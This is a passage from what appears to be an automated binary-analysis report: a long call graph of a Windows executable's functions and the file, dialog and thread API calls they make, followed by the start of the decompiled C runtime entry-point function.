calls 14596->14598 14597->14599 14601 409046 14598->14601 14599->14463 14600 409135 14604 403a9c ctype 29 API calls 14600->14604 14603 401d7a 30 API calls 14601->14603 14602 402634 30 API calls 14602->14605 14606 409053 14603->14606 14607 409152 14604->14607 14605->14600 14605->14602 14608 403998 30 API calls 14605->14608 14613 403a9c ctype 29 API calls 14605->14613 14609 403a9c ctype 29 API calls 14606->14609 14610 403a9c ctype 29 API calls 14607->14610 14608->14605 14611 40905f 14609->14611 14612 40915a 14610->14612 14833 4092e9 14611->14833 14615 403a9c ctype 29 API calls 14612->14615 14613->14605 14615->14599 14617 4049e7 __EH_prolog 14616->14617 14618 401c80 30 API calls 14617->14618 14623 4049f6 14618->14623 14619 401ce1 30 API calls 14621 404a56 14619->14621 14622 404a6d GetLastError 14621->14622 14629 404bb2 14621->14629 14641 401e3a 30 API calls 14621->14641 14642 404b41 14621->14642 14646 401d7a 30 API calls 14621->14646 14650 403a9c ctype 29 API calls 14621->14650 15446 40499c 14621->15446 14622->14621 14624 404aea 14622->14624 14623->14619 14633 404a38 14623->14633 14626 402ee1 30 API calls 14624->14626 14625 401d7a 30 API calls 14647 404b4e 14625->14647 14628 404af2 14626->14628 14627 403a9c ctype 29 API calls 14631 4031e6 14627->14631 14632 405841 37 API calls 14628->14632 14630 403a9c ctype 29 API calls 14629->14630 14630->14633 14631->14475 14631->14476 14634 404b01 14632->14634 14633->14627 14635 404b05 14634->14635 14636 404b35 14634->14636 14637 403a9c ctype 29 API calls 14635->14637 14639 403a9c ctype 29 API calls 14636->14639 14640 404b1d 14637->14640 14638 401e3a 30 API calls 14638->14647 14639->14642 14643 403a9c ctype 29 API calls 14640->14643 14641->14621 14642->14625 14645 404b25 14643->14645 14644 40499c 34 API calls 14644->14647 14648 403a9c ctype 29 API calls 14645->14648 14646->14621 14647->14629 14647->14638 14647->14644 14649 403a9c ctype 29 API calls 14647->14649 14648->14631 14649->14647 14650->14621 14652 401d7a 30 API calls 14651->14652 14653 4026ac 14652->14653 14654 401d7a 30 API calls 14653->14654 14655 4026d8 14654->14655 14656 405d0b 30 API calls 14655->14656 14657 4026df 14656->14657 14657->14485 14671 40bbd3 __EH_prolog 14658->14671 14659 40bd4e 14660 40bd90 14659->14660 14661 40bd63 14659->14661 14665 403a76 30 API calls 14660->14665 14663 4042d6 ctype 34 API calls 14661->14663 14666 40c46d 35 API calls 14666->14671 14668 4042ad 34 API calls ctype 14668->14671 14671->14659 14671->14666 14671->14668 14684 40bc23 14671->14684 15576 40c30e 14671->15576 15582 40c281 14671->15582 15586 40c413 14671->15586 14684->14491 14708 40bdf7 14707->14708 14709 40be1c 14708->14709 14710 40be78 14708->14710 14712 403a76 30 API calls 14708->14712 14718 40c5e8 30 API calls 14708->14718 14721 40be5b 14708->14721 14722 40c73a 62 API calls 14708->14722 14723 40bf45 14708->14723 14726 40ad19 81 API calls 14708->14726 14730 40ca4c 62 API calls 14708->14730 14731 40c0f3 14708->14731 14732 40c059 14708->14732 14733 40c0b5 14708->14733 14736 40c156 14708->14736 14711 40c380 34 API calls 14709->14711 14714 40c380 34 API calls 14710->14714 14712->14708 14718->14708 14721->14491 14722->14708 14724 40c380 34 API calls 14723->14724 14725 40bf76 14724->14725 14726->14708 14730->14708 14734 40c380 34 API calls 14731->14734 14737 40c380 34 API calls 14732->14737 14738 40c380 34 API calls 14733->14738 14741 40c380 34 API calls 14736->14741 14744 409573 __EH_prolog 14743->14744 14745 40602f 33 API calls 14744->14745 14746 409585 14745->14746 16072 4094f6 14746->16072 14752 4055e8 __EH_prolog 14751->14752 14753 40551a FindClose 14752->14753 14754 4055f6 14753->14754 14755 405607 FindFirstFileW 14754->14755 14756 40562e 14754->14756 14761 40562c 14754->14761 14757 40561e 14755->14757 14755->14761 14758 401c80 30 API calls 14756->14758 14769 4056a6 14757->14769 14760 405639 AreFileApisANSI 14758->14760 14762 403d04 31 API calls 14760->14762 14761->14554 14763 405654 FindFirstFileA 14762->14763 14764 403a9c ctype 29 API calls 14763->14764 14765 40566e 14764->14765 14766 403a9c ctype 29 API calls 14765->14766 14767 40567a 14766->14767 14767->14761 14773 405705 14767->14773 14770 4056e4 14769->14770 14771 401d1b 30 API calls 14770->14771 14772 405701 14771->14772 14772->14761 14774 40570f __EH_prolog 14773->14774 14785 4052b2 14774->14785 14779 401d7a 30 API calls 14780 405794 14779->14780 14781 403a9c ctype 29 API calls 14780->14781 14782 40579c 14781->14782 14783 403a9c ctype 29 API calls 14782->14783 14784 4057a4 14783->14784 14784->14761 14786 4052c9 14785->14786 14787 40243e 30 API calls 14786->14787 14788 4052d8 AreFileApisANSI 14787->14788 14789 4057b5 14788->14789 14790 403b9c 31 API calls 14789->14790 14791 405787 14790->14791 14791->14779 14793 404e80 __EH_prolog 14792->14793 14794 404ea2 14793->14794 14795 404f2d 14793->14795 14797 404eb7 GetFullPathNameW 14794->14797 14799 402170 30 API calls 14794->14799 14796 40243e 30 API calls 14795->14796 14798 404f40 14796->14798 14802 404ed8 14797->14802 14881 4048ff 14798->14881 14799->14797 14802->14573 14802->14574 14805 403a9c ctype 29 API calls 14806 404f76 14805->14806 14807 404f8b 14806->14807 14808 404f7b 14806->14808 14896 405352 14807->14896 14809 403a9c ctype 29 API calls 14808->14809 14809->14802 14814 403a9c ctype 29 API calls 14815 404fb3 14814->14815 14902 405331 14815->14902 14818 404818 32 API calls 14819 404fd0 14818->14819 14820 403a9c ctype 29 API calls 14819->14820 14821 404fdc 14820->14821 14822 402634 30 API calls 14821->14822 14823 404ff1 14822->14823 14824 401d7a 30 API calls 14823->14824 14825 404ffd 14824->14825 14834 4092f3 __EH_prolog 14833->14834 14835 401d7a 30 API calls 14834->14835 14836 409308 14835->14836 14837 402634 30 API calls 14836->14837 14838 409315 14837->14838 14839 405841 37 API calls 14838->14839 14840 409324 14839->14840 14841 403a9c ctype 29 API calls 14840->14841 14842 409338 14841->14842 14843 409352 14842->14843 14918 413d3d RaiseException 14842->14918 14845 4042d6 ctype 34 API calls 14843->14845 14846 40935a 14845->14846 14846->14568 14861 408a45 __EH_prolog 14847->14861 14848 408ea0 30 API calls 14848->14861 14849 408cfb 14852 405e34 VariantClear 14849->14852 14850 401d7a 30 API calls 14850->14861 14851 408e75 14854 405e34 VariantClear 14851->14854 14860 408a61 14852->14860 14854->14860 14855 408ce8 15029 4038c2 14855->15029 14857 4093f0 30 API calls 14857->14861 14859 4038c2 29 API calls 14859->14861 14860->14575 14860->14576 14861->14848 14861->14849 14861->14850 14861->14851 14861->14855 14861->14857 14861->14859 14861->14860 14863 408d0e 14861->14863 14866 408d55 14861->14866 14867 408dae 14861->14867 14871 408e06 14861->14871 14919 408902 14861->14919 14932 405e34 14861->14932 14936 40836d 14861->14936 14961 408524 14861->14961 15025 40848c 14861->15025 14864 4038c2 29 API calls 14863->14864 14864->14860 14869 4038c2 29 API calls 14866->14869 14870 4038c2 29 API calls 14867->14870 14869->14860 14870->14860 14872 4038c2 29 API calls 14871->14872 14872->14860 14874 40918e __EH_prolog 14873->14874 14875 402170 30 API calls 14874->14875 14876 4091c1 14875->14876 15443 40590e 14876->15443 14879 402170 30 API calls 14880 4091e2 14879->14880 14880->14560 14882 404909 __EH_prolog 14881->14882 14883 401c80 30 API calls 14882->14883 14884 40491c AreFileApisANSI 14883->14884 14885 403d04 31 API calls 14884->14885 14886 404936 14885->14886 14887 403a9c ctype 29 API calls 14886->14887 14888 40493e 14887->14888 14889 404df9 14888->14889 14890 404e26 GetFullPathNameA 14889->14890 14891 404e1e 14889->14891 14893 404e45 14890->14893 14892 40243e 30 API calls 14891->14892 14892->14890 14894 404e50 14893->14894 14895 404e5b lstrlenA 14893->14895 14894->14805 14895->14894 14905 40536e 14896->14905 14899 404818 AreFileApisANSI 14900 403b9c 31 API calls 14899->14900 14901 404839 14900->14901 14901->14814 14903 40536e 30 API calls 14902->14903 14904 404fc2 14903->14904 14904->14818 14907 405378 __EH_prolog 14905->14907 14906 4053ac 14909 40243e 30 API calls 14906->14909 14907->14906 14908 4053a1 14907->14908 14910 403d24 30 API calls 14908->14910 14911 4053bf 14909->14911 14912 404f99 14910->14912 14913 40243e 30 API calls 14911->14913 14912->14899 14914 4053cc 14913->14914 14915 403d24 30 API calls 14914->14915 14916 4053fa 14915->14916 14917 403a9c ctype 29 API calls 14916->14917 14917->14912 14918->14843 14920 40890c __EH_prolog 14919->14920 14921 408927 14920->14921 14922 40894b 14920->14922 14923 403a76 30 API calls 14921->14923 14925 403a76 30 API calls 14922->14925 14927 40892e 14922->14927 14923->14927 14924 408524 86 API calls 14926 4089b8 14924->14926 14928 408957 14925->14928 14926->14861 14927->14924 15036 406434 14928->15036 14931 408994 GetLastError 14931->14926 14935 405e39 14932->14935 14933 405e5a VariantClear 14933->14861 14934 405e71 14934->14861 14935->14933 14935->14934 14937 408377 __EH_prolog 14936->14937 14938 4083a3 14937->14938 14939 4083b6 14937->14939 14940 405e34 VariantClear 14938->14940 14941 4083cc 14939->14941 14942 4083bd 14939->14942 14945 4083af 14940->14945 14943 4083ca 14941->14943 14944 40846a 14941->14944 14946 401d1b 30 API calls 14942->14946 14948 405e34 VariantClear 14943->14948 14947 405e34 VariantClear 14944->14947 14945->14861 14946->14943 14947->14945 14949 4083ed 14948->14949 14949->14945 14950 401d7a 30 API calls 14949->14950 14951 4083fd 14950->14951 14952 408421 14951->14952 14953 40842c 14951->14953 14954 40844f 14951->14954 14956 405e34 VariantClear 14952->14956 14957 401db8 30 API calls 14953->14957 14954->14952 14955 40843f 14954->14955 14958 405e34 VariantClear 14955->14958 14956->14945 14959 408435 14957->14959 14958->14945 15039 407d25 14959->15039 14963 40852e __EH_prolog 14961->14963 15047 40455d 14963->15047 14965 402170 30 API calls 14967 408570 14965->14967 14966 4085c4 14968 4085df 14966->14968 14980 4085ef 14966->14980 14967->14966 14972 401e19 30 API calls 14967->14972 14969 4039df 30 API calls 14968->14969 14987 4085ea 14969->14987 14970 40863c 14970->14987 15016 408648 14970->15016 15090 4042eb 14970->15090 14973 4085ab 14972->14973 14974 401d7a 30 API calls 14973->14974 14977 4085b8 14974->14977 14981 403a9c ctype 29 API calls 14977->14981 14978 4039df 30 API calls 14978->14980 14979 4042ad ctype 34 API calls 14982 408742 14979->14982 14980->14970 14980->14978 15083 4088ce 14980->15083 15087 404407 14980->15087 14981->14966 14983 403a9c ctype 29 API calls 14982->14983 14984 40874a 14983->14984 14985 403a9c ctype 29 API calls 14984->14985 14986 408752 14985->14986 14986->14861 14988 40876b 14987->14988 14992 4087a1 14987->14992 14987->15016 15051 4065b2 14987->15051 15057 40df69 14987->15057 15063 40d1ab 14987->15063 14989 4042ad ctype 34 API calls 14988->14989 14990 408788 14989->14990 14991 403a9c ctype 29 API calls 14990->14991 14994 408790 14991->14994 14993 4087f8 14992->14993 14997 401d1b 30 API calls 14992->14997 14992->15016 14995 405e34 VariantClear 14993->14995 14996 403a9c ctype 29 API calls 14994->14996 14998 408804 14995->14998 14996->14986 14997->14993 14999 408879 14998->14999 15000 40881d 14998->15000 15001 4088ce 5 API calls 14999->15001 15002 401c80 30 API calls 15000->15002 15003 408884 15001->15003 15004 40882b 15002->15004 15006 407d82 35 API calls 15003->15006 15005 401c80 30 API calls 15004->15005 15007 408838 15005->15007 15008 4088a0 15006->15008 15094 407d82 15007->15094 15010 401d7a 30 API calls 15008->15010 15012 4088ad 15010->15012 15014 403a9c ctype 29 API calls 15012->15014 15013 401d7a 30 API calls 15015 40885c 15013->15015 15014->15016 15017 403a9c ctype 29 API calls 15015->15017 15016->14979 15026 408496 __EH_prolog 15025->15026 15027 405e34 VariantClear 15026->15027 15028 408511 15027->15028 15028->14861 15030 403a9c ctype 29 API calls 15029->15030 15031 4038cd 15030->15031 15032 403a9c ctype 29 API calls 15031->15032 15033 4038d5 15032->15033 15034 403a9c ctype 29 API calls 15033->15034 15035 4038dd 15034->15035 15035->14860 15037 405b6d 35 API calls 15036->15037 15038 406440 15037->15038 15038->14927 15038->14931 15040 407d3a 15039->15040 15040->15040 15043 4021c4 15040->15043 15044 402208 15043->15044 15045 4021d8 15043->15045 15044->14955 15046 402170 30 API calls 15045->15046 15046->15044 15048 40456d 15047->15048 15049 401e19 30 API calls 15048->15049 15050 404592 15049->15050 15050->14965 15052 4065c2 15051->15052 15053 4065bb 15051->15053 15104 405ace SetFilePointer 15052->15104 15053->14987 15058 40df7a 15057->15058 15062 4065b2 3 API calls 15058->15062 15059 40df8e 15060 40df9e 15059->15060 15111 40dd8b 15059->15111 15060->14987 15062->15059 15064 40d1b5 __EH_prolog 15063->15064 15065 40df69 34 API calls 15064->15065 15066 40d208 15065->15066 15067 40d20e 15066->15067 15068 40d22f 15066->15068 15145 40d2cf 15067->15145 15141 40f8c3 15068->15141 15072 40d261 15151 40f4d8 15072->15151 15073 40d242 15074 40d2cf 34 API calls 15073->15074 15082 40d21a 15074->15082 15082->14987 15084 4088d9 15083->15084 15086 4088f6 15083->15086 15085 403b4f ctype 5 API calls 15084->15085 15084->15086 15085->15084 15086->14980 15088 4042ff 30 API calls 15087->15088 15089 40440f 15088->15089 15089->14980 15092 403a9c 29 API calls 15090->15092 15374 40ba4f 15090->15374 15091 4042fc 15091->14987 15092->15091 15095 407d8c __EH_prolog 15094->15095 15408 407dd5 15095->15408 15098 40235e 30 API calls 15099 407db0 15098->15099 15100 401ce1 30 API calls 15099->15100 15101 407dbb 15100->15101 15102 403a9c ctype 29 API calls 15101->15102 15103 407dc3 15102->15103 15103->15013 15105 405b01 15104->15105 15106 405af7 GetLastError 15104->15106 15107 406534 15105->15107 15106->15105 15108 406538 15107->15108 15109 40653b GetLastError 15107->15109 15108->15053 15110 406545 15109->15110 15110->15053 15112 40dd95 __EH_prolog 15111->15112 15123 40776f 15112->15123 15114 40ddc1 15114->15060 15115 40ddae 15115->15114 15126 4076d5 15115->15126 15117 40decb 15118 403a9c ctype 29 API calls 15117->15118 15118->15114 15119 40dde7 ctype 15119->15117 15120 40ded0 15119->15120 15132 406505 15119->15132 15121 4065b2 3 API calls 15120->15121 15121->15117 15137 407723 15123->15137 15127 4076e2 15126->15127 15128 407716 15126->15128 15129 4076ed ctype 15127->15129 15130 403a76 30 API calls 15127->15130 15128->15119 15131 403a9c ctype 29 API calls 15129->15131 15130->15129 15131->15128 15133 405ba8 ReadFile 15132->15133 15134 40651d 15133->15134 15135 406534 GetLastError 15134->15135 15136 406530 15135->15136 15136->15119 15138 407737 15137->15138 15139 407766 15138->15139 15140 406505 ReadFile GetLastError 15138->15140 15139->15115 15140->15138 15142 40f8cd __EH_prolog 15141->15142 15177 40f648 15142->15177 15146 40d2d9 __EH_prolog 15145->15146 15147 4042d6 ctype 34 API calls 15146->15147 15148 40d2fd 15147->15148 15149 4042ad ctype 34 API calls 15148->15149 15150 40d308 15149->15150 15150->15082 15178 40f652 __EH_prolog 15177->15178 15217 40d377 15178->15217 15182 40f694 15183 40db47 RaiseException 15182->15183 15184 40f6c9 15182->15184 15183->15184 15191 40d23b 15184->15191 15216 4065b2 3 API calls 15184->15216 15185 40f720 15186 4076d5 30 API calls 15185->15186 15185->15191 15191->15072 15191->15073 15216->15185 15218 40d3d2 34 API calls 15217->15218 15219 40d37f 15218->15219 15220 4042d6 ctype 34 API calls 15219->15220 15221 40d38a 15220->15221 15222 4042d6 ctype 34 API calls 15221->15222 15223 40d395 15222->15223 15224 4042d6 ctype 34 API calls 15223->15224 15225 40d3a0 15224->15225 15226 4042d6 ctype 34 API calls 15225->15226 15227 40d3ab 15226->15227 15228 4042d6 ctype 34 API calls 15227->15228 15229 40d3b6 15228->15229 15229->15182 15281 40db47 15229->15281 15282 413d3d RaiseException 15281->15282 15283 40db5f 15282->15283 15284 40db6f 15283->15284 15285 40db47 RaiseException 15283->15285 15284->15182 15285->15284 15376 40ba66 15374->15376 15375 40ba9e 15375->15091 15376->15375 15378 403a9c ctype 29 API calls 15376->15378 15379 40a011 15376->15379 15378->15376 15380 40a01b __EH_prolog 15379->15380 15381 4042ad ctype 34 API calls 15380->15381 15382 40a036 15381->15382 15383 4042ad ctype 34 API calls 15382->15383 15384 40a045 15383->15384 15385 4042d6 ctype 34 API calls 15384->15385 15386 40a05f 15385->15386 15387 4042ad ctype 34 API calls 15386->15387 15388 40a06a 15387->15388 15389 4042d6 ctype 34 API calls 15388->15389 15390 40a081 15389->15390 15391 4042ad ctype 34 API calls 15390->15391 15392 40a08c 15391->15392 15397 407868 15392->15397 15398 407880 15397->15398 15399 407887 15397->15399 15400 413260 SetEvent GetLastError 15398->15400 15401 407891 15399->15401 15402 407896 15399->15402 15400->15399 15403 413210 WaitForSingleObject 15401->15403 15404 4131e0 ctype CloseHandle GetLastError 15402->15404 15403->15402 15405 40789d 15404->15405 15406 4131e0 ctype CloseHandle GetLastError 15405->15406 15407 4078a5 15406->15407 15409 407ddf __EH_prolog 15408->15409 15411 401e19 30 API calls 15409->15411 15415 407e63 15409->15415 15410 407eb5 15412 407ebe 15410->15412 15413 407ecf 15410->15413 15417 407e1b 15411->15417 15433 407cd4 15412->15433 15416 402634 30 API calls 15413->15416 15415->15410 15419 407e8e 15415->15419 15432 407da4 15416->15432 15418 403b4f ctype 5 API calls 15417->15418 15420 407e28 15418->15420 15421 401e3a 30 API calls 15419->15421 15422 403a9c ctype 29 API calls 15420->15422 15423 407e9a 15421->15423 15424 407e39 15422->15424 15425 402634 30 API calls 15423->15425 15424->15415 15426 407e3e 15424->15426 15427 407e5e 15425->15427 15428 401e3a 30 API calls 15426->15428 15430 403a9c ctype 29 API calls 15427->15430 15429 407e4a 15428->15429 15431 402634 30 API calls 15429->15431 15430->15432 15431->15427 15432->15098 15434 407cde __EH_prolog 15433->15434 15435 401ce1 30 API calls 15434->15435 15436 407cf1 15435->15436 15437 407d25 30 API calls 15436->15437 15438 407d00 15437->15438 15439 401ce1 30 API calls 15438->15439 15440 407d0b 15439->15440 15441 403a9c ctype 29 API calls 15440->15441 15442 407d13 15441->15442 15442->15432 15444 402170 30 API calls 15443->15444 15445 405925 15444->15445 15445->14879 15447 4049ab 15446->15447 15448 4049cd CreateDirectoryW 15446->15448 15449 4048ff 32 API calls 15447->15449 15448->14621 15450 4049b6 15449->15450 15455 40498d CreateDirectoryA 15450->15455 15452 4049bd 15453 403a9c ctype 29 API calls 15452->15453 15454 4049c7 15453->15454 15454->14621 15455->15452 15577 40c318 __EH_prolog 15576->15577 15583 40c290 15582->15583 15585 40c296 15582->15585 15583->14671 15585->15583 16071 413d3d RaiseException 15585->16071 15587 4042ff 30 API calls 15586->15587 15588 40c41b 15587->15588 15588->14671 16071->15583 16073 409500 __EH_prolog 16072->16073 16074 401ce1 30 API calls 16073->16074 16075 409513 16074->16075 16076 401c80 30 API calls 16075->16076 16077 409524 16076->16077 16078 401e56 30 API calls 16077->16078 16079 409537 16078->16079 16080 403a9c ctype 29 API calls 16079->16080 16081 409543 16080->16081 16082 401ce1 30 API calls 16081->16082 16087 403426 __EH_prolog 16086->16087 16088 4042d6 ctype 34 API calls 16087->16088 16089 403452 16088->16089 16090 4042ad ctype 34 API calls 16089->16090 16091 40345d 16090->16091 16092 4042d6 ctype 34 API calls 16091->16092 16093 403471 16092->16093 16094 4042ad ctype 34 API calls 16093->16094 16095 40347c 16094->16095 16095->14505 16097 4035b0 __EH_prolog 16096->16097 16098 402170 30 API calls 16097->16098 16099 4035dd 16098->16099 16106 403664 16099->16106 16103 403614 16104 403570 16103->16104 16113 413d3d RaiseException 16103->16113 16104->14521 16114 413310 InitializeCriticalSection 16106->16114 16108 4035f1 16109 4132a0 CreateEventA 16108->16109 16110 4132c1 GetLastError 16109->16110 16111 4132be 16109->16111 16112 4132cb 16110->16112 16111->16103 16112->16103 16113->16104 16114->16108 16116 416efc 30 API calls 16115->16116 16117 4148ce 16116->16117 16118 414911 16117->16118 16121 4148dc CreateThread 16117->16121 16119 413f9f ctype 29 API calls 16118->16119 16120 414917 16119->16120 16122 413239 16120->16122 16125 416e77 16120->16125 16121->16122 16123 414909 GetLastError 16121->16123 16122->14526 16122->14527 16123->16118 16142 416ef3 16125->16142 16128 416eb0 16130 416eea 35 API calls 16128->16130 16129 416e99 16131 416ec0 16129->16131 16133 416ea3 16129->16133 16132 416eb5 16130->16132 16134 416edd 16131->16134 16135 416ed0 16131->16135 16132->16122 16137 416eea 35 API calls 16133->16137 16136 416eea 35 API calls 16134->16136 16138 416eea 35 API calls 16135->16138 16139 416ee2 16136->16139 16140 416ea8 16137->16140 16141 416ed5 16138->16141 16139->16122 16140->16122 16141->16122 16143 415523 35 API calls 16142->16143 16144 416e7d 16143->16144 16144->16128 16144->16129 16146 406215 __EH_prolog 16145->16146 16147 406240 16146->16147 16148 406226 DialogBoxParamW 16146->16148 16149 40243e 30 API calls 16147->16149 16155 4030ca 16148->16155 16150 406253 16149->16150 16151 40629a DialogBoxParamA 16150->16151 16152 401c80 30 API calls 16150->16152 16153 403a9c ctype 29 API calls 16151->16153 16154 406269 16152->16154 16153->16155 16156 401a18 31 API calls 16154->16156 16164 413210 WaitForSingleObject 16155->16164 16157 406278 16156->16157 16158 4052f9 30 API calls 16157->16158 16159 406285 16158->16159 16160 403a9c ctype 29 API calls 16159->16160 16161 40628d 16160->16161 16162 403a9c ctype 29 API calls 16161->16162 16163 406295 16162->16163 16163->16151 16164->14540 16166 406053 __EH_prolog 16165->16166 16167 406074 16166->16167 16168 406065 SetWindowTextW 16166->16168 16169 401c80 30 API calls 16167->16169 16176 4030ed 16168->16176 16170 40607c 16169->16170 16171 403d04 31 API calls 16170->16171 16172 40608b SetWindowTextA 16171->16172 16173 403a9c ctype 29 API calls 16172->16173 16174 4060a1 16173->16174 16175 403a9c ctype 29 API calls 16174->16175 16175->16176 16176->14545 16178 4023a8 16177->16178 16180 4023c1 16178->16180 16181 402559 16178->16181 16180->13999 16182 402569 16181->16182 16183 4021c4 30 API calls 16182->16183 16184 402577 ctype 16183->16184 16184->16180 16186 403f46 __EH_prolog 16185->16186 16187 40243e 30 API calls 16186->16187 16188 403f69 16187->16188 16189 403f9a 16188->16189 16191 401ee5 30 API calls 16188->16191 16190 403d24 30 API calls 16189->16190 16192 403fa6 16190->16192 16191->16188 16193 403a9c ctype 29 API calls 16192->16193 16194 403fae 16193->16194 16194->14047 16196 4040c8 __EH_prolog 16195->16196 16197 403a76 30 API calls 16196->16197 16198 4040d4 16197->16198 16199 4040fe 16198->16199 16200 401ce1 30 API calls 16198->16200 16201 4039df 30 API calls 16199->16201 16202 4040ee 16200->16202 16203 40410f 16201->16203 16204 401ce1 30 API calls 16202->16204 16203->14047 16204->16199 16206 403a9c ctype 29 API calls 16205->16206 16207 40214a 16206->16207 16208 403a9c ctype 29 API calls 16207->16208 16209 402151 16208->16209 16209->14047 16211 405f68 __EH_prolog 16210->16211 16212 405ff8 16211->16212 16213 405f7f 16211->16213 16226 405ebc 16212->16226 16215 402170 30 API calls 16213->16215 16217 405f93 16215->16217 16220 405fb2 LoadStringW 16217->16220 16221 402170 30 API calls 16217->16221 16218 401a03 31 API calls 16219 405ff3 16218->16219 16223 403a9c ctype 29 API calls 16219->16223 16220->16217 16222 405fcb 16220->16222 16221->16220 16224 401ce1 30 API calls 16222->16224 16225 4015a2 16223->16225 16224->16219 16225->13514 16227 405ec6 __EH_prolog 16226->16227 16228 40243e 30 API calls 16227->16228 16229 405ee9 16228->16229 16230 405f08 LoadStringA 16229->16230 16231 40243e 30 API calls 16229->16231 16230->16229 16232 405f21 16230->16232 16231->16230 16232->16232 16233 403d24 30 API calls 16232->16233 16234 405f42 16233->16234 16235 403a9c ctype 29 API calls 16234->16235 16236 405f4a 16235->16236 16236->16218 16273 404c54 __EH_prolog 16272->16273 16274 404d51 30 API calls 16273->16274 16275 404c64 16274->16275 16308 405468 16275->16308 16278 405468 30 API calls 16279 404c86 16278->16279 16280 403d24 30 API calls 16279->16280 16281 404c97 16280->16281 16282 403a9c ctype 29 API calls 16281->16282 16288 404ca3 16282->16288 16284 404cfe 16285 403a9c ctype 29 API calls 16284->16285 16287 404d0a 16285->16287 16286 403d24 30 API calls 16286->16288 16289 40551a FindClose 16287->16289 16288->16284 16288->16286 16292 404cd3 16288->16292 16318 405949 16288->16318 16322 404d6c 16288->16322 16291 404d13 16289->16291 16337 40489c SetFileAttributesA 16291->16337 16295 403a9c ctype 29 API calls 16292->16295 16294 404d1c 16296 404d27 16294->16296 16338 4048aa RemoveDirectoryA 16294->16338 16297 404cdf 16295->16297 16300 403a9c ctype 29 API calls 16296->16300 16299 40551a FindClose 16297->16299 16301 404ce8 16299->16301 16302 404d31 16300->16302 16303 403a9c ctype 29 API calls 16301->16303 16305 404cf0 16303->16305 16307 403a9c ctype 29 API calls 16305->16307 16306 401a41 16306->13536 16307->16306 16309 405472 __EH_prolog 16308->16309 16310 403d24 30 API calls 16309->16310 16311 405485 16310->16311 16312 401ee5 30 API calls 16311->16312 16313 405494 16312->16313 16314 403d24 30 API calls 16313->16314 16315 40549f 16314->16315 16316 403a9c ctype 29 API calls 16315->16316 16317 404c75 16316->16317 16317->16278 16320 405951 16318->16320 16321 40596a 16320->16321 16339 405929 16320->16339 16321->16288 16323 404d76 __EH_prolog 16322->16323 16324 404d88 16323->16324 16325 404da9 16323->16325 16349 405417 16324->16349 16327 405417 30 API calls 16325->16327 16329 404db8 16327->16329 16331 404bdc 2 API calls 16329->16331 16332 404da2 16331->16332 16333 403a9c ctype 29 API calls 16332->16333 16334 404dc9 16333->16334 16335 403a9c ctype 29 API calls 16334->16335 16337->16294 16338->16296 16340 405939 16339->16340 16341 40592e 16339->16341 16343 40553a 32 API calls 16340->16343 16345 4057cf FindNextFileA 16341->16345 16344 405937 16343->16344 16344->16320 16346 4057f1 16345->16346 16347 4057ff 16345->16347 16348 40557f 30 API calls 16346->16348 16347->16344 16348->16347 16350 405421 __EH_prolog 16349->16350 16351 403d24 30 API calls 16350->16351 16352 405434 16351->16352 16359 4054b9 16352->16359 16360 40248c 30 API calls 16359->16360 16361 405443 16360->16361 16371 416d5d 16362->16371 16365 416cc9 GetCurrentProcess TerminateProcess 16366 416cda 16365->16366 16367 416d44 16366->16367 16368 416d4b ExitProcess 16366->16368 16374 416d66 16367->16374 16372 41570a ctype 29 API calls 16371->16372 16373 416cbe 16372->16373 16373->16365 16373->16366 16377 41576b LeaveCriticalSection 16374->16377 16376 414bed 16376->13692 16377->16376 16378 416cb8 16379 416d5d 29 API calls 16378->16379 16380 416cbe 16379->16380 16381 416cc9 GetCurrentProcess TerminateProcess 16380->16381 16382 416cda 16380->16382 16381->16382 16383 416d44 16382->16383 16384 416d4b ExitProcess 16382->16384 16385 416d66 LeaveCriticalSection 16383->16385 16386 416d49 16385->16386 16387 41584a SetUnhandledExceptionFilter 16388 40b8bb 16389 40b8c8 16388->16389 16390 40b8d9 16388->16390 16389->16390 16394 40b8fa 16389->16394 16393 403a9c ctype 29 API calls 16393->16390 16395 40b904 __EH_prolog 16394->16395 16396 4042d6 ctype 34 API calls 16395->16396 16397 40b928 16396->16397 16398 4042ad ctype 34 API calls 16397->16398 16399 40b933 16398->16399 16400 4042d6 ctype 34 API calls 16399->16400 16401 40b94a 16400->16401 16402 4042ad ctype 34 API calls 16401->16402 16403 40b955 16402->16403 16404 4099bc 34 API calls 16403->16404 16405 40b8d3 16404->16405 16405->16393 16407 40372e 16412 40374a 16407->16412 16410 403743 16411 403a9c ctype 29 API calls 16411->16410 16413 403754 __EH_prolog 16412->16413 16428 4037de 16413->16428 16415 403777 16416 403a9c ctype 29 API calls 16415->16416 16417 403782 16416->16417 16432 4036d0 DeleteCriticalSection 16417->16432 16420 403a9c ctype 29 API calls 16421 403793 16420->16421 16422 403a9c ctype 29 API calls 16421->16422 16423 4037ad 16422->16423 16424 403a9c ctype 29 API calls 16423->16424 16425 4037b5 16424->16425 16426 403a9c ctype 29 API calls 16425->16426 16427 403736 16426->16427 16427->16410 16427->16411 16429 4037e7 16428->16429 16430 4037eb DestroyWindow 16428->16430 16429->16415 16431 4037fb 16430->16431 16431->16415 16433 4131e0 ctype 2 API calls 16432->16433 16434 4036e5 16433->16434 16435 403a9c ctype 29 API calls 16434->16435 16436 4036ed 16435->16436 16436->16420

                              Executed Functions

                              Function 00414B04 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81COMMON
                              Download Yara Rule

                              Control-flow Graph

                              C-Code - Quality: 83%
                              			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				unsigned int _t15;
				signed int _t27;
				intOrPtr _t29;
				signed int _t35;
				intOrPtr _t52;

				_t47 = __edi;
				_push(0xffffffff);
				_push(0x41b9e0);
				_push(E00414A2C);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t52;
				_push(__edi);
				_v28 = _t52 - 0x58;
				_t15 = GetVersion();
				 *0x4233d0 = 0;
				_t35 = _t15 & 0x000000ff;
				 *0x4233cc = _t35;
				 *0x4233c8 = _t35 << 8;
				 *0x4233c4 = _t15 >> 0x10;
				if(E004159F8(_t35 << 8, 1) == 0) {
					E00414C31(0x1c);
				}
				if(E004154BC() == 0) {
					E00414C31(0x10);
				}
				_v8 = 0;
				E00417641();
				 *0x425a3c = GetCommandLineA();
				 *0x423340 = E0041750F();
				E004172C2();
				E00417209();
				E00416C69();
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				_v104 = E004171B1();
				_t56 = _v96.dwFlags & 0x00000001;
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t27 = 0xa;
				} else {
					_t27 = _v96.wShowWindow & 0x0000ffff;
